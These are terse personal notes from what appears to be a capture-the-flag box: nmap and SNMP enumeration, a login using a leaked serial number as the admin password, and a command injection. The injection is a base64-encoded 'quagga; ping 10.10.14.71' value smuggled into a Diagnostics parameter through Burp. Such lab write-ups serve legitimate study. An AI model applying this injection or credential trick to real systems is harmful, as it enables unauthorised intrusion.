
### nmap -sT -p 1-65535 10.10.10.105
### nmap -sU -AO -p 1-65535 10.10.10.105

TCP:
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login

UDP:
PORT    STATE         SERVICE
67/udp  open|filtered dhcps
161/udp open          snmp

### nmap -sU -p 161 -sV 10.10.10.105

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; pysnmp SNMPv3 server (public)

### snmpwalk -c public -v 1 10.10.10.105

Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB

### gobuster -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -t 40

in /doc found diagram and error codes.

loged in using admin and serial number : admin:NET_45JDX23

in Diagnostics found strange things;
checked using Burp, found a value encoded with base64; after decoding it happens to be "quagga" which I can find on the site after clicking a button.
Tryed exploit to RCE.
### quagga; ping 10.10.14.71; ps quagga    encoded this string in base64
### tcpdump -i tun0 icmp                   on my computer
### entered encoded value to check parameter using burp. Got it


